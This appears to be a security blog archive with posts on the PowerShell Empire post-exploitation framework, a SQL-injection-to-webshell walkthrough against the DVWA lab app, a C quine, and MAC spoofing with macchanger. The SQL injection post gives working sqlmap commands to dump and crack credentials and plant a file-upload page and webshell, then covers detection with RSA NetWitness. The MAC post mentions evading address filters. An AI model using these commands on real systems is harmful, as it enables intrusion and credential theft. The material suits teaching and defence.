Wednesday, January 24, 2018

PowerShell Empire Download – Post-Exploitation Hacking Tool

PowerShell Empire Module Categories

Currently Empire Power Shell has the following categories for modules:
  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxilary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz

Why Empire PowerShell?

PowerShell offers a multitude of offensive advantages, including:
  • Full .NET access
  • Application whitelisting
  • Direct access to the Win32 API
  • Ability to assemble malicious binaries in memor
  • Default installation on Windows 7+.
Powershell for Pentesters had a watershed year in 2014, but despite the multitude of useful projects, many pen-testers still struggle to integrate PowerShell into their engagements in a secure manner.

How PowerShell Empire Hacking Tools Works

Listeners – Think of this like a metasploit handler, this will catch your session.
Stagers – This is your payload, this is what you will execute on your target system.
Agents – This is how you interact with the target system, you can gather stats & info or run shell commands.
It also had fairly robust logging built in.
You can download PowerShell Empire here:
Or read more here.

Tuesday, October 24, 2017

SQL Injection to WebShell

An SQL Injection attack is not only limited to dumping a database, but can also allow the attacker to upload files to the remote server and consequently gain remote access via a WebShell.
WebShells can receive commands from the attackers mainly using 2 methods:
  • based on GET requests, which can easily be detected through logs and SIEM solutions as the commands are visible in the URL
  • based on POST, which is a bit more stealthy as the commands are submitted in the payload and therefore not part of the logs

We will see how to:
  • use sqlmap to perform an SQL Injection attack
  • dump the database using sqlmap
  • use sqlmap to automatically provide WebShell access based on GET requests
  • use sqlmap to upload a custom and more advanced WebShell (b374k) which relies on POST
To test the SQL Injections, we will use the DVWA (Damn Vulnerable Web Application), which is a web application purposely built with vulnerabilities and weaknesses for pen-testing.

Then we will see how the RSA NetWitness Suite can help in identifying SQL Injections and WebShells (whether using POST or GET).

Performing the SQL Injection Attack

We first need to access the web application, in my case, it is located at

To access the internal pages (which contains the vulnerable page), we first need to login. In a real life scenario, the vulnerability might not require authentication, or, the attacker could have gotten access to a valid user account through a phishing attack or brute-forcing. In our case, we will consider that we already have an account, admin/password.
Once logged in, we will go to the page which is vulnerable to SQL Injections. Again, in our case, we already know which page it is. Typically we could have use a web application vulnerability scanner to crawl the website and look for weaknesses.

To perform the attack, we will need 2 things:
  • The URL containing the parameters that need to be tested for vulnerabilities
  • The authentication cookie, as we need to be authenticated to be able to access the page, and therefore sqlmap will need to have access to reach the page

To get the cookie value, in Chrome,  it can be found in "Inspect --> Application --> Cookies"

We will now use this is sqlmap to test the page for SQL Injection vulnerabilities.
sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low"
sqlmap will try to identify the type of database as well as any parameter within the page vulnerable to SQL Injections. In our case, it identified that the "id" parameter is vulnerable and that the back-end database is MySQL.

We will now add the "--dbs" argument at the end of the command to list the available databases on the web server.
sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" --dbs

sqlmap outputs the available databases. We want to look at the tables available under the "dvwa" database. To do that, we will replace "--dbs" with "-D dvwa --tables" to specifically list the tables of that database.
sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" -D dvwa --tables

sqlmap outputs the avialble tables. One of them is the "users" tables. We now want to output the columns of that table. To do that, we will replace "--tables" with "-T users --columns"
sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" -D dvwa -T users --columns

We can see there are 2 columns of interest, "user" and "password". To dump the content of these tables, we will replace "--columns" with "-C user,password --dump"
sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" -D dvwa -T users -C user,password --dump

sqlmap provides us with a list of usernames and password hashes. We can also see that sqlmap provides the option to store the hashes to try and crack them using a dictionary attack. We will answer "Y" to that and we will use the default dictionary.

sqlmap now shows the usernames with their respective clear-text passwords based on the dictionary attack.
This shows how sqlmap can be used to dump the content of a database. But sqlmap also provides the option to get shell access (via a WebShell).

Gaining WebShell Access with sqlmap

Using the same command structure, instead of listing databases, we will provide the "--os-shell" argument. This will make sqlmap upload a simple WebShell to the web server and interact with.
sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" --os-shell

sqlmap will ask for some information regarding the language used by the web server. In our case it is PHP, so it knows to upload a PHP WebShell. We will also upload it to the default location (/xampp/htdocs/). We are provided with an interactive shell from which we can send commands and get the output back.

The problem with this type of WebShell is that it's very basic and uses GET requests, which can be easily detected using logs and SIEM solutions.
Next we will look how to upload our own files using sqlmap (instead of the default WebShell provided by sqlmap), such as the b374k WebShell.

Uploading Custom Files and WebShells using sqlmap

sqlmap allows to download and upload custom files. We will therefore use the "--file-write" and "--file-dest" parameters to upload our own files.
We will start by uploading a PHP upload page, from which we will be able to upload any file we want to the web server.
The following is the "upload.php" file:
$path_name = pathinfo($_SERVER['PHP_SELF']);
$this_script = $path_name['basename'];
<form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
File: <input name="file" type="file" /><br />
<input type="submit" value="Upload" /></form>
if (!empty($_FILES["file"]))
if ($_FILES["file"]["error"] > 0)
{echo "Error: " . $_FILES["file"]["error"] . "<br>";}
{echo "Stored file:".$_FILES["file"]["name"]."<br/>Size:".($_FILES["file"]["size"]/1024)." kB<br/>";
// open this directory
$myDirectory = opendir(".");
// get each entry
while($entryName = readdir($myDirectory)) {$dirArray[] = $entryName;} closedir($myDirectory);
$indexCount = count($dirArray);
echo "$indexCount files<br/>";
echo "<TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks><TR><TH>Filename</TH><th>Filetype</th><th>Filesize</th></TR>\n";
for($index=0; $index < $indexCount; $index++)
if (substr("$dirArray[$index]", 0, 1) != ".")
echo "<TR>
<td><a href=\"$dirArray[$index]\">$dirArray[$index]</a></td>
echo "</TABLE>";
Once we upload this file, we will be able to access it through a browser and use it to upload our WebShell.
To upload the "upload.php" file using sqlmap, we will use the following command:
sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" --file-dest="/xampp/htdocs/upload.php" --file-write="~/Desktop/upload.php"
In the above command, "/xampp/htdocs/upload.php" is the location where to write the file on the remote web server, and the "~/Desktop/upload.php" is the location of the WebShell on the local machine of the attacker.

Once uploaded, we can then access the upload page from a browser at the "" URL, from where we can upload the "b374k.php" WebShell (or any other file as well).

Once uploaded, we can then access the WebShell either by clicking on the filename in the list, or by browsing to
We now have access to a more advanced WebShell which allows us to:

Browse the file system, download files, upload files ...

List running processes with the option to kill them.

Or have an interactive shell from where to execute commands.

And all of it from an easy to use, user friendly graphic interface.
And most importantly, using POST requests instead of GET, which allows the specific commands executed not to be detected by the web server logs.


Now that we have seen how to perform this attack, here are some ways to detect the different steps using the RSA NetWitness Suite.

Using RSA NetWitness Packets, it is possible to detect SQL Injection attempts, whether the tool is abusing parameters in the URL (GET) or from within forms (POST), as the whole payload is captured and analyzed, as opposed to only the URL. In the below example we can see that RSA NetWitness Packets was able to detect the SQL Injection.

Then, it is possible to identify the the actual WebShell file that is being used, as well as the commands executed by the attacker. RSA NetWitness Packets is also able to identify that the web session contains CLI commands, which is an indicator of WebShell activity.

Having the entire network payload, it is also possible to reconstruct the WebShell session and see the commands and outputs, providing insight into what the attacker was actually able to get.

Using RSA NetWitness Endpoint, we would also be able to see the web server service running CLI commands, which is a suspicious behavior and typical of WebShells. The tracking section would allow us to see the exact commands executed.

Using both packets and endpoint, we would be able to identify the SQL Injection, the WebShell files used as part of the attack and the exact commands executed by the attacker, providing the full scope of the attack to the analyst. 

Thursday, August 17, 2017

C Program to Print its Own Source Code

Ever wondered how to write a C program to print its own source code? Well, here is the source code of a C program that when executed will print its own source code. In other words, the output of this program is exactly same as its source code.
Here’s the program:
char *program="#include<stdio.h>%cchar *program=%c%s%c;%cvoid main()%c{%cprintf(program,10,34,program,34,10, 10,10,10);%c}";
void main() { printf(program,10,34,program,34,10,10,10,10); }

Friday, July 28, 2017

How to Use Macchanger

Macchanger User Guide

One fundamental skill that any knowledgeable hacker needs to learn is how to spoof various addresses. In this particular tutorial we will be talking about macchanger but when most people think about spoofing an address, they typically think of masking their IP address with NAT or a VPN tunnel. That said, users also need to learn how to spoof their MAC address.
What is a MAC Address, and What Are They Used for?
Unlike an IP address (a layer 3 address), MAC addresses operate at layer two of the OSI model. As the name implies (Media Access Control), they are used to control and identify different computing systems as they connect to a layer two medium such as a wireless network or a LAN switch. Also understand that each network card has a globally unique MAC address that is composed of two parts – the OUI (Organizationally Unique Identifier) and a unique ID.
MAC addresses are composed of 12 hexadecimal digits, and the first six identify the network card manufacturer. The remaining 6 digits identify a unique network card specific to any given manufacturer. If you want to see who made your network card, simply Google the first six digits of your MAC address. The following are just a few of uses of MAC addresses:
  • Static IP’s – If a network administrator didn’t want to use DHCP, they can configure static IP addresses. This is most typically done for servers since it would be a disadvantage if their IP addresses were constantly changing.
  • Address Filtering – some network administrators only allow specific devices to connect to a network, and they make filtering decisions based on MAC addresses since they are globally unique.
  • Authentication Applications – Sometimes ISPs and other network services require a user to sign in or log on with their MAC address.
  • Identification and Temporal Services – Often coffee shops and airports will only permit a short amount of free Internet (30 minutes to an hour). After the time limit has been reached, they will sometimes ban a MAC address, but spoofing your address will allow more free access.
  • Tracking Devices – Because every MAC address is globally unique, it is possible for software to track which locations and networks individual computers connect to.
Mac-2The following is an example of a valid MAC address:
  • 00:40:96:43:b7:de
In this example, 00:40:96 is the OUI that identifies this MAC address as belonging to a Cisco Aironet product. If you are using a Windows computer and you wish to view your MAC address, the procedure is relatively simple. First, simply open the command prompt by hitting the Windows key and typing “cmd.” This should pull up an application with an icon that looks like a small black window. Once the command prompt has been opened, issue the following command:
  • ipconfig /all
This will display a wealth of information about your computer’s various network interfaces. However, we are interested in the field labeled “physical address,” which will display each network interface’s MAC address. Users on Apple systems or Linux systems can issue the following variant of theifconfig command:
  • ifconfig -a
Why Spoof Your Mac Address?
The first reason is to ensure that they cover their tracks and don’t leave their globally unique MAC address in tables on a wireless router or network switch. These devices keep tables of known MAC addresses and bind them to layer three addresses, such as an IP address. Essentially, this would leave an audit trail that would lead back to the hacker’s computer. But there are many other reasons.
Believe it or not, some network administrators control access to their network by only permitting known MAC addresses to send data on the local network. If a hacker’s MAC address wasn’t allowed to send data, the hacker couldn’t even send a ping to another computer on the local network. However, if they know a device that ispermitted to send data, all the hacker needs to do is spoof their MAC address to a known host’s MAC address to gain network access.
Macchanger Tutorial
In this demonstration, we are going to run through the steps necessary to use Macchanger to spoof our IP address from an Ubuntu command line (BASH shell). We will be performing the commands on an Ethernet interface, but the same concept and procedure applies to other interfaces. Furthermore, there are comparable alternatives to Macchanger for Windows and Apple systems, and some of them even have GUI interfaces that are ludicrously simple and easy to use.
Step 1
The very first thing we need to do is verify that our Ethernet interface is up and running. It is also advisable to check the card’s actual physical address. So, to start off, run the ifconfig eth0 command to check the status of your network card.
Step 2
The next thing we need to do is shut down our Ethernet interface to make the change. To disable the Ethernet interface, issue the ifconfig eth0 downcommand.
Step 3
Next, simply use Macchanger to spoof the MAC address. By entering themacchanger -r eth0 command, users can change their MAC address to a randomly generated address.
Step 4
Sometimes users may encounter the following error:
  • ERROR: Can’t change MAC: interface up or not permission: Cannot assign requested address
If this is the case, make sure that two things are true. Firstly, ensure that your Ethernet interface is truly down with the ifconfig eth0 down command. Secondly, make sure that you are running these commands as the root user.
Step 5
Verify that the MAC address has truly been changed with the ifconfig eth0command. If you wish to enter a specific MAC address instead of a randomly generated one, users can use the mac changer -m [MAC ADDRESS]command.
Final Thoughts
It’s pretty darn easy to configure a new MAC address for a Linux system. In fact, the operation shouldn’t even take novices more than a minute to complete. Remember, spoofing addresses is a pretty basic skill for a hacker to learn. I would also caution you not to use this information to break into a network that you don’t have permission to access. If, for example, your MAC address is blocked, I wouldn’t advise you to employ these methods to gain access, because doing so could be illegal depending on the context and location of the network in question. At any rate, this simple demonstration should show you just how easy it is to spoof a MAC address.

PowerShell Empire Download – Post-Exploitation Hacking Tool

PowerShell Empire Module Categories Currently Empire Power Shell has the following categories for modules: Code Execution – Ways to ru...